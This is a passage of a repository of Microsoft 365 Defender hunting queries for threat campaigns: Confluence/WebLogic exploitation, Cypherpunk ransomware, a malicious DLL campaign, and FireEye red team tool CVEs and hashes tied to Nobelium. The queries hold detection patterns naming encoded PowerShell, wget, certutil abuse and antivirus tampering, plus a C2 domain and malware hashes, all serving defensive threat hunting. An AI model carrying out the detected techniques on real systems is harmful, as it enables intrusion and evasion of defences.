[Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Dario Brambilla **GitHub alias:** darioongit **Organization:** Microsoft 365 Defender ================================================ FILE: Campaigns/confluence-weblogic-targeted.md ================================================ # Confluence and WebLogic servers targeted by campaign This query was originally published in the threat analytics report, *Confluence and WebLogic abuse*. 2019 has seen several seemingly related campaigns targeting Atlassian Confluence Server and Oracle WebLogic Server. Although these campaigns use different implants and delivery methods, they consistently use the same infrastructure, and exploit the same vulnerabilities. The campaigns have specifically targeted: * [CVE-2019-3396](https://nvd.nist.gov/vuln/detail/CVE-2019-3396) - [Software update](https://jira.atlassian.com/browse/CONFSERVER-57974) * [CVE-2019-2725](https://nvd.nist.gov/vuln/detail/CVE-2019-2725) - [Software update](https://www.oracle.com/security-alerts/alert-cve-2019-2725.html) The following query detects activity broadly associated with these campaigns. ## Query ```Kusto DeviceProcessEvents | where Timestamp >= ago(7d) | where // "Grandparent" process is Oracle WebLogic or some process loading Confluence InitiatingProcessParentFileName == "beasvc.exe" or InitiatingProcessFileName == "beasvc.exe" or InitiatingProcessCommandLine contains "//confluence" // Calculate for Base64 in Commandline | extend Caps = countof(ProcessCommandLine, "[A-Z]", "regex"), Total = countof(ProcessCommandLine, ".", "regex") | extend Ratio = todouble(Caps) / todouble(Total) | where ( FileName in~ ("powershell.exe" , "powershell_ise.exe") // PowerShell is spawned // Omit known clean processes and ProcessCommandLine !startswith "POWERSHELL.EXE -C \"GET-WMIOBJECT -COMPUTERNAME" and ProcessCommandLine !contains "ApplicationNo" and ProcessCommandLine !contains "CustomerGroup" and ProcessCommandLine !contains "Cosmos" and ProcessCommandLine !contains "Unrestricted" and ( ProcessCommandLine contains "$" // PowerShell variable declaration or ProcessCommandLine contains "-e " // Alias for "-EncodedCommand" parameter or ProcessCommandLine contains "encodedcommand" or ProcessCommandLine contains "wget" //or ( Ratio > 0.4 and Ratio < 1.0) // Presence of Base64 strings ) ) or ( FileName =~ "cmd.exe" // cmd.exe is spawned and ProcessCommandLine contains "@echo" and ProcessCommandLine contains ">" // Echoing commands into a file ) or ( FileName =~ "certutil.exe" // CertUtil.exe abuse and ProcessCommandLine contains "-split" // the "-split" parameter is required to write files to the disk ) | project Timestamp, InitiatingProcessCreationTime , DeviceId , Grandparent_PID = InitiatingProcessParentId, Grandparent = InitiatingProcessParentFileName, Parent_Account = InitiatingProcessAccountName, Parent_PID = InitiatingProcessId, Parent = InitiatingProcessFileName , Parent_Commandline = InitiatingProcessCommandLine, Child_PID = ProcessId, Child = FileName , Child_Commandline = ProcessCommandLine ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | v | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/cypherpunk-exclusive-commands.md ================================================ # Cypherpunk remote execution through PSEXESVC This query was originally published in the threat analytics report, *Cypherpunk ransomware leaves wake of tampered AVs*. Cypherpunk is a human-operated ransomware campaign named after the unusual *.cypherpunk* extension given to encrypted files. The query below surfaces commands that follow the distinctive pattern Cypherpunk operators would use to remotely execute code. ## Query ```kusto // Searches for possible Cypherpunk ransomware activity DeviceProcessEvents | where InitiatingProcessParentFileName startswith "psexe" | where ProcessCommandLine has "Dvr /go" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | v | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/cypherpunk-remote-exec-w-psexesvc.md ================================================ # Cypherpunk remote execution through PSEXESVC This query was originally published in the threat analytics report, *Cypherpunk ransomware leaves wake of tampered AVs*. Cypherpunk is a human-operated ransomware campaign named after the unusual *.cypherpunk* extension given to encrypted files. The attackers often used PSEXESVC, a service that helps the PsExe.exe utility run commands on a remote device. Both PSEXESVC and PsExe.exe are legitimate parts of Windows; however, they can be repurposed by attackers to perform malicious actions. The query below can find instances of PSEXESVC being used to launch batch files, as often occurred in Cypherpunk attacks. ## Query ```kusto // Searches for remote batch file launch using PSEXESVC.exe DeviceProcessEvents | where InitiatingProcessParentFileName startswith "psexe" | where InitiatingProcessCommandLine has ".bat" | where ProcessCommandLine has "DisableIOAVProtection" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | v | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/detect-cyzfc-activity.md ================================================ # Detect activity associated with malicious DLL, cyzfc.dat These queries was originally published in the threat analytics report, *Attacks on gov't, think tanks, NGOs*. As described further in *[Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers](https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/)*, there was a very large spear-phishing campaign launched in November 2019. The attackers would gain access to a target by having the user click on a link to a compromised website and download a .zip archive. Once established on a target's device, the attackers used a malicious DLL named *cyzfc.dat* to execute additional payloads. They would call a function in the malicious DLL via the legitimate Windows process, [rundll32.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32), to connect directly to their command-and-control (C2) servers. The following queries detect activity associated with the malicious DLL, *cyzfc.dat.*, used in this campaign. ## Query ```Kusto ​// Query 1: Events involving the DLL container let fileHash = "9858d5cb2a6614be3c48e33911bf9f7978b441bf"; find in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents, DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents) where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash | where Timestamp > ago(10d) // Query 2: C2 connection DeviceNetworkEvents | where Timestamp > ago(10d) | where RemoteUrl == "pandorasong.com" // Query 3: Malicious PowerShell DeviceProcessEvents | where Timestamp > ago(10d) | where ProcessCommandLine contains "-noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJ" // Query 4: Malicious domain in default browser commandline DeviceProcessEvents | where Timestamp > ago(10d) | where ProcessCommandLine contains "https://www.jmj.com/personal/nauerthn_state_gov" // Query 5: Events involving the ZIP let fileHash = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1"; find in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents, DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents) where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash | where Timestamp > ago(10d) ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/fireeye-red-team-tools-CVEs [Nobelium].md ================================================ # FireEye Red Team tool CVEs [Nobelium] Search for the CVEs that should be prioritized and resolved to reduce the success of the FireEye Red Team tools compromised by the Nobelium activity group. See [red_team_tool_countermeasures](https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md) on the [official FireEye repo](https://github.com/fireeye). ## Query ```Kusto let FireEyeCVE= dynamic( [ "CVE-2019-11510", //pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 10.0 "CVE-2020-1472", //Microsoft Active Directory escalation of privileges - CVSS 10.0 "CVE-2018-13379", //pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN - CVSS 9.8 //no find CVE "CVE-2018-15961", //RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell) - CVSS 9.8 "CVE-2019-0604", //RCE for Microsoft Sharepoint - CVSS 9.8 "CVE-2019-0708", //RCE of Windows Remote Desktop Services (RDS) - CVSS 9.8 "CVE-2019-11580", //Atlassian Crowd Remote Code Execution - CVSS 9.8 "CVE-2019-19781", //RCE of Citrix Application Delivery Controller and Citrix Gateway - CVSS 9.8 //no find CVE "CVE-2020-10189", //RCE for ZoHo ManageEngine Desktop Central - CVSS 9.8 "CVE-2014-1812", //Windows Local Privilege Escalation - CVSS 9.0 "CVE-2019-3398", //Confluence Authenticated Remote Code Execution - CVSS 8.8 "CVE-2020-0688", //Remote Command Execution in Microsoft Exchange - CVSS 8.8 "CVE-2016-0167", //local privilege escalation on older versions of Microsoft Windows - CVSS 7.8 "CVE-2017-11774", //RCE in Microsoft Outlook via crafted document execution (phishing) - CVSS 7.8 "CVE-2018-8581", //Microsoft Exchange Server escalation of privileges - CVSS 7.4 "CVE-2019-8394" //arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus - CVSS 6.5 ] ); DeviceTvmSoftwareVulnerabilitiesKB | where CveId in(FireEyeCVE) | join DeviceTvmSoftwareVulnerabilities on CveId | project-away CveId1, VulnerabilitySeverityLevel1, AffectedSoftware ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | v | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | v | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Dario Brambilla **GitHub alias:** darioongit **Organization:** Microsoft 365 Defender ================================================ FILE: Campaigns/fireeye-red-team-tools-HASHs [Nobelium].md ================================================ # FireEye Red Team tool HASHs [Nobelium] This query searches for the HASHs of the FireEye Red Team tools compromised by the Nobelium activity group. See [all-hashes.csv](https://github.com/fireeye/red_team_tool_countermeasures/blob/master/all-hashes.csv) on the [official FireEye repo](https://github.com/fireeye). ## Query ```Kusto let MD5Hash= dynamic( [ '013c7708f1343d684e3571453261b586', '01d68343ac46db6065f888a094edfe4f', '04eb45f8546e052fe348fda2425b058c', '05b99d438dac63a5a993cea37c036673', '09bdbad8358b04994e2c04bb26a160ef', '0a86d64c3b25aa45428e94b6e0be3e08', '0b1e512afe24c31531d6db6b47bac8ee', '100d73b35f23b2fe84bf7cd37140bf4d', '11b5aceb428c3e8c61ed24a8ca50553e', '12c3566761495b8353f67298f15b882c', '150224a0ccabce79f963795bf29ec75b', '152fc2320790aa16ef9b6126f47c3cca', '226b1ac427eb5a4dc2a00cc72c163214', '2398ed2d5b830d226af26dedaf30f64a', '24a7c99da9eef1c58f09cf09b9744d7b', '25a97f6dba87ef9906a62c1a305ee1dd', '294b1e229c3b1efce29b162e7b3be0ab', '2b686a8b83f8e1d8b455976ae70dab6e', '2e67c62bd0307c04af469ee8dcb220f2', '3322fba40c4de7e3de0fda1123b0bf5d', '3651f252d53d2f46040652788499d65a', '383161e4deaf7eb2ebeda2c5e9c3204c', '3b926b5762e13ceec7ac3a61e85c93bb', '3bb34ebd93b8ab5799f4843e8cc829fa', '3e61ca5057633459e96897f79970a46d', '3fb9341fb11eca439b50121c6f7c59c7', '4022baddfda3858a57c9cbb0d49f6f86', '4326a7e863928ffbb5f6bdf63bb9126e', '4410e95de247d7f1ab649aa640ee86fb', '4414953fa397a41156f6fa4f9462d207', '4456e52f6f8543c3ba76cb25ea3e9bd2', '44887551a47ae272d7873a354d24042d', '45736deb14f3a68e88b038183c23e597', '4bf96a7040a683bd34c618431e571e26', '4e7e90c7147ee8aa01275894734f4492', '4fd62068e591cbd6f413e1c2b8f75442', '5125979110847d35a338caac6bff2aa8', '562ecbba043552d59a0f23f61cea0983', '590d98bb74879b52b97d8a158af912af', '5e14f77f85fd9a5be46e7f04b8a144f5', '66cdaa156e4d372cfa3dea0137850d20', '66e0681a500c726ed52e5ea9423d2654', '68acf11f5e456744262ff31beae58526', '6902862bd81da402e7ac70856afbe6a2', '6a9a114928554c26675884eeb40cc01b', '6efb58cf54d1bb45c057efcfbbd68a93', '6f04a93753ae3ae043203437832363c4', '79259451ff47b864d71fb3f94b1774f3', '7af24305a409a2b8f83ece27bb0f7900', '7c2a06ceb29cdb25f24c06f2a8892fba', '7e6bc0ed11c2532b2ae7060327457812', '7f8102b789303b7861a03290c79feba0', '8025bcbe3cc81fc19021ad0fbc11cf9b', '82773afa0860d668d7fe40e3f22b0f3e', '82e33011ac34adfcced6cddc8ea56a81', '83ed748cd94576700268d35666bf3e01', '848837b83865f3854801be1f25cb9f4d', '8c91a27bbdbe9fb0877daccd28bd7bb5', '8d949c34def898f0f32544e43117c057', '9529c4c9773392893a8a0ab8ce8f8ce1', '98ecf58d48a3eae43899b45cec0fc6b7', '995120b35db9d2f36d7d0ae0bfc9c10d', '9c8eb908b8c1cda46e844c24f65d9370', '9ccda4d7511009d5572ef2f8597fba4e', '9dcb6424662941d746576e62712220aa', '9e85713d615bda23785faf660c1b872c', '9f401176a9dd18fa2b5b90b4a2aa1356', 'a107850eb20a4bb3cc59dbd6861eaf0f', 'a495c6d11ff3f525915345fb762f8047', 'a8b5dcfea5e87bf0e95176daa243943d', 'a91bf61cc18705be2288a0f6f125068f', 'aeb0e1d0e71ce2a08db9b1e5fb98e0aa', 'b66347ef110e60b064474ae746701d4a', 'b8415b4056c10c15da5bba4826a44ffd', 'c0598321d4ad4cf1219cc4f84bad4094', 'c74ebb6c238bbfaefd5b32d2bf7c7fcc', 'cdf58a48757010d9891c62940c439adb', 'cf752e9cd2eccbda5b8e4c29ab5554b6', 'd0a830403e56ebaa4bfbe87dbfdee44f', 'd5d3d23c8573d999f1c48d3e211b1066', 'd7cfb9fbcf19ce881180f757aeec77dd', 'd93100fe60c342e9e3b13150fd91c7d8', 'db0eaad52465d5a2b86fdd6a6aa869a5', 'dd8805d0e470e59b829d98397507d8c2', 'dfbb1b988c239ade4c23856e42d4127b', 'e0683f8ee787313cfd2c61cd0995a830', 'e4efa759d425e2f26fbc29943a30f5bd', 'e7beece34bdf67cbb8297833c5953669', 'e89efa88e3fda86be48c0cc8f2ef7230', 'e91670423930cbbd3dbf5eac1f1a7cb6', 'ece07daca53dd0a7c23dacabf50f56f1', 'edcd58ba5b1b87705e95089002312281', 'eeedc09570324767a3de8205f66a5295', 'f20824fa6e5c81e3804419f108445368', 'f3dd8aa567a01098a8a610529d892485', 'f41074be5b423afb02a74bc74222e35d', 'f59095f0ab15f26a1ead7eed8cdb4902', 'f7d9961463b5110a3d70ee2e97842ed3', 'fa255fdc88ab656ad9bc383f9b322a76', 'fbefb4074f1672a3c29c1a47595ea261' ] ); let SHA1Hash= dynamic( [ '5968670c0345b0ab5404bd84cb60d7af7a625020', 'fb514d59d4beabd97a25c2eefb74ce85b16edaac', '863514b3c3f88d084bbe27bf7ba59189fbdbd902', '0c8e807969295237c74a1016c284f99975e761b9', '226c07a66c530350e9c89ddbe550646e94b5ff96', '1bfaccc392df6d62fb3d8c9e69b72f0b4c5a478a', '7bbdbe9f26a3d96e31d648551e66f91a9bd928ab', '0613d4a7556d13889727e2e3312abfc2f6bbc046', 'c47cf12067a0ddf212a890f26dc8578d8bb705cb', '9a6e4d1a0b682abc848e5c7a6f8782cb0213fc5c', 'af35d96b1e70d05a0c556bb9fa46af7450db1474', 'f7d483346611ce1d3e5bf8eeebfc7be122a131b9', '4e1aead0a6c181afbd12c75f8da5a1a01acafc6c', '8ac4feca574feb39aa887ac24803cc66fc658789', 'ac9db0eb0ef64d4b9fa68f52c713904e6fd4d6e6', 'f142936d2ab1e023ffc39d41a801d18a0c7df398', '12e46031d953fd0a9a2b0ec573b695420eafd5f2', '03324510e41c7b9fec35516aca947850d4ef7529', '5d358567e549a6f8e471697f7c78bc8bdf2a6534', '33d6eef3c7c5a496cc22acaaa7aed03d59af498a', '803b1743cb5498543802c14e67a34c61977d73b5', '4d0c07c7a215ec9d563b0a3e73899e56fcf94566', '67f7ba6b4c301d372d8fb28cb231fb13a58b1dc9', 'd5adb0dc551c3c97fc929d86e039672b97ddc65e', '063ede02eb666c16c61135aa27b1a026014cfc77', 'e54f5737847287e49a306f312995c9aba38314d4', 'e74f4f592e17a7c3c9be85b430dddeea2c3abda4', 'ae9d8a3e09b55a45c0452a293dcb01fab556f810', 'a1065c1a5d908796745e9c5be297ea2d402859dc', '05ddb03cd423042ee6af3a14b6c4c0772eb75757', '3c0c8e162bb8d42348beb6f4527f303c7487ce96', 'df8543eaddb005dab92ef0cdab7c19b41ef647f8', '75e87b5ff18b2c53688e43a2e599fd6b3ab06d92', '268d4e63b8fb38d37556384549717531e50eb65f', 'f4cb5107f1b9755ce0e8f7a7f85f5536fd204019', '38e866dd44dce667dd19652e28324b6110e808bd', '218651ac5b575c3f9642c2e9a5928aa22fab8483', '472af2b122c23bf0ca10c78d389a5a7f030a3536', '520cab82bb5bcfd8abd2301b648aafe0555044c4', 'b49972eed626571914116bae4446be571598dd81', '3a4adb4ff64ddcdd0f1b2a86f04d2b72da5d9c92', '22109552d6af71d392de199e21ae272009db608a', 'ccc5cb5b399bbf9d2959aafdc90233fa4ca9380d', '849f81a20a4bb9985066d9e38f4adfba07bc5444', 'cc542c0f873470b3eb292f082771eec61c16b3d7', '590bd7609edf9ea8dab0b5fbc38393a870b329de', '41c11e48c3a64484b38a2d64ab3b9453bae05a14', 'e468a7947c497b435bdf1a50cf0f73abf849c79b', 'a5c4975199bfe820bd0076bb5b7c68be93ba7bf8', 'f38bf87c73ac188fc60a2bfa5bba1c838148a8a1', 'a1e3e694b147767efcab214f099a1488726abd0f', 'aaa153236b7676899572760482951d3edad7a8b5', '25be1b61ce1f9dcc498c64a5a753efb96df3ae4c', '39bb0e9765e0137d09dc8d41fa1dded24e1fdeed', '5b93345c18faa20ef1f2d3f7fb5a299c27e4b66d', 'f5a605c29af773c9f5604c8f5546c991d24d2dc2', 'db99f1ef9b630fc16deb23d8c7d7df2441bc80e5', 'c226cb69f2a017712cc94493f51d7726f933bcda', '5b3b08f15ac3bbf2644f88b0615536f33a1ff1a8', '42f81c4cfca1438371829b7ad5e7b3db54a2cddf', '1c23dd83c6ebba6f870b1ad02f326ea730ea53a5', '2b663679da2a7070f91945784ac167ed3ded7280', 'fd1e67da7919dc7d0fbab0c5d02ee6e12537f2ef', '93c1078cb6d0aeab90eb0b83ec4a737ce7bcccdc', '05d900d16d2738b0bded3ba4a60ff24adc0776f1', 'fc19e8dae2215446ade30b6bc7aa5d4b0d6627f7', 'f30ef3957c930cf2aa74361d4d229777e7ee40ef', '964e161dd92df9b160a6f7c7d1dedf216e8fed2c', 'bf4254555a5f4d3299aae8d4ffc28bbb1dfec3c6', '50726acc45f673d6f0924a8bf030f3f07b1cd9c5', 'd535de08875cef1c49bfa2532281fa1254a8cb93', '7935da6efb19ea558fe6b1f98f3b244b4a74794b', '589f7878efd02dd5a0832c6e523f4914cbcfd450', '8f7d4f9eed06c1d175ef6321fb7110183aabbb7c', '467b32e7414308b245c6c004303a5638e0fa7bdf', 'b98cded462dfd80c682c953830e3df744cac756d', '3df6b6fb4870b66931e91a59a5f9c013198bc310', 'c26f164336ea82a40b2186270249d2fe5571b12d', 'e53ff219a6d5d0713ddfa54f8fff7ff703e5e85f', 'fa9905d231bb1565086dcf2608ee2125bf585c01', 'c1fe1a306c4d7106d5a0bb47d3880836d9ecc2c6', '7323ca7b92edbd195b2d7e18c91fd48b4c96a0cc', 'f9881d2380363cb7b3d316bbf2bde6c2d7089681', 'ca112215ba3abf12bd65e15f018def811b9d5938', 'bcdf6ddccab0c348d85ca52077ffbef12f94a336', '28a15a0b532c47110297aa6f4f46bad4d72235a2', 'ad5bff008e0e270d19eaa7e211b1c821d4091b68', '7f308945c4904ef168bbf57c86e56c8a3f836a2e', '74fc338bbab1a1f42699165c588dc91639d0343b', '4f3ec6a4af8fddf85a0f2933b6cabee44e74fe33', '41a491270ec2bd6d230be4d163c719e6d46265e7', '17e199488c301aad10861cdeb1ee5087d2c87517', '0225b06163d58bc55c6e4f6b451c5553dc9558c7', 'f6bb18873580f645c09758fda398655ce5e3eff3', '2933c394fa06892dbd1ce2937b4c2344e8239ef8', 'a6119a5c321b2755bffdb4919d910a18b0613842', '86e975d05de96e0ea088ffdde9993f9247f0ee03', '3248ac428a7c888723398a5c2535b5b95f550754', 'b1b5dbea32917b7db654dc193de98b840abdbcb5', '004809dcd28c0cf078d65cc11a478d50cb3cba0d' ] ); let SHA256Hash = dynamic( [ '77bdcb2a9873c4629d8675c8ce9cc8a0cf35c514e27f7a6dc2bc4b31f79dd9e2', 'f937aa71e0b1cb3f9a4d5c0e8ffa4f383b781dd878e71e4b73c1f084b4a7e6de', '8469341f65cc42b86ef7ded04eca8a00266f34d6d2916330af1bf40fb69e26f0', 'd3ca5583c98a4ab0cc65773addd3444435eea13e70e3929629535f14dfe8b63b', '2051f5d7c79e67a02880ca9f2fc0cdf4fa8827fc515f16baa743193c9b178ba0', '4ce2df07fecdc7f7852c686440e3b421c159d8fc382481ce70165a77741fb2c4', '9e170d1146efeee09f888c7b1bbfb10dec3ede9cc0b20b6b137c52dd146fd302', '2b7a2703e77cb735fae7b90bbd5a2fa481aea1c34c3fb7bfada61cbcebb35efc', 'd0b6413c3dabe564435291b65f28119ad5a9c1fabc05ee48820f728740cb1a03', '4be84a291b6c6a5f019c1c6b1ceff3b4bc3668d5874b1a423838a57560788158', '79f2cd2009fe104e5ed6ad25d0ba06b10fb7c0983e88beab27e55b78cd2a5300', 'c4bb5b85710d7e78e82a57eb2ac2c8f7796972bada1ddc6af7ae6d318bc87aa3', 'a9827ea4e45194c65a3ff6cf03345b16bd24047165bd91d4595caae8488529db', '59a4ae454be71f8a036a7b4c74ae40f4ca6e7105dabfabb4637e87b7a9afb51d', 'fe33146518676279692217e32f8c36a9749d705981e672ebbde79c80b32dd8b7', '6e1c976151313a24fbd1f620a0a2c66aaf5489d44b8153eb12e789bfbea3731f', '5751ac3b127f6c8cf251d995ac6254f8999ab227dd6da870f1e0249b3ce56bb6', '964efc495e4e1a2075fcd48a661166fb8df81d81d8ac2c26768325dc15da7f70', 'd9882283ee2dc487c2a5fb97f8067051c259c4721cd4aea8c435302fe6b274c4', 'c11d6bdda1972a2f538f0daea099df17ce76077098b9f3f72459cf7db1ec5ec6', '178dc666df641f4f1f184d54c7bcac4764e81bb1c3b03a7207b321660c77770b', '5756a54a1d9ae74df58008048c6042e7254cc7eed0389f556db3f000cb191000', 'c828558c67601c94511720748a49703b09814bcd21be2caa98b36faa445e19db', 'a57112c53bf2ee334a6d01b39cb43ec8de42ba18ea925d55132567274b742ce6', '6e05bebdc38c4bd34c83d2ca6b954ce84c87ed78fd0d932576593a3ad710e3c3', '25e755c8957163376b3437ce808843c1c2598e0fb3c5f31dc958576cd5cde63e', '8e16cd7d498eb69d7b3e079e1353e0df6eec70a845986475d7cf65a6740b4434', '44f3c63c1f6414f2c3e602a57ba38f340287fe2acc15ff0c88dca503c67b1a0c', 'fe664bb9dc2976d6d2ccc07582b5c5eb85b896cc439a9af91db7e51b1c905bdb', '3805caa8e426a6f7d7d3ce9c87ce188b20185b134d936a69b9d51125b1264dea', '40db7affc23dcaf88c288d6a918b6371a45dcfa16e08543e9442d4d952a9ecc4', '4878d5d7933e096305c70c83499b84893b6bd0dbe226e16ea90430efeb8b8593', 'faf76f9e66c7392cddbe7bcc73b00dc2ca2d8d1da6f46f5686dadc2e0a559acb', '09b1003b673b559c3599dcb9250112bd3a602602f2836b54d5d7cdd1c4c4e6f2', '3f1d22893c626346f8d361076bc66797d55b09a959ec0d36ec3d48048983f138', '652d3717353df8fc3145ecc9f2c871034a58f2519bdd0c70a72a3d8c88bad48c', '078403b4e89ff06d2fe2ed7e75428a381f83ffb708dbd01b0220767498947f0c', '82cce26c60a5105e6caf5ac92eabb3dedcd883cd075f2056f27b0ec58aefaaa6', '4d004d168b0bb9bed836404e850796173ac27efd8489738394a265478224cf27', '6652e27ad1bf5002665b2d0821e75092a087103408560682295f90706a3289cb', 'b051ee189faf36e2d6c382fede530e9274b42bc9c42e210b4ee1bc84b0419ba6', '0340043481091d92dcfb2c498aad3c0afca2fd208ef896f65af790cc147f8891', 'bfe88e7986fbf27db90f18959a0b1e237b6f0395fa11b9eb386e5bac143c1d2d', '7404a08ecc0aa0d84f039d078ad39804856206ae58dde360238d4a1943557333', 'efb533249f71ea6ebfb6418bb67c94e8fbd5f2a26cbd82ef8ec1d30c0c90c6c1', '73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f', '9a84cb10b7ba0b96eea473900d58052511af7b235383b6a496dffab9b982d20d', '9af4272d6cc0e926f74ccf68d0a4d056eb37059214c312ef3628bca45a7d76cf', 'b262d0c81ac5a13c1a6aa650d1ca7b04117f654a2a97bfe7ac4a7ca8ae9a6ed5', '432010e6d7a42710b10464e440fa4e2df2bb387839d56a5b371727dc6c3da272', 'b58de9beaf70bfd12cd6fb372f52eff5405f96602c22034a80ef01b4f9e2ded4', '5f0bc27c272937e3ef788c290939481137148c1c5c70dbb7d1fb13cb22e3e2c1', 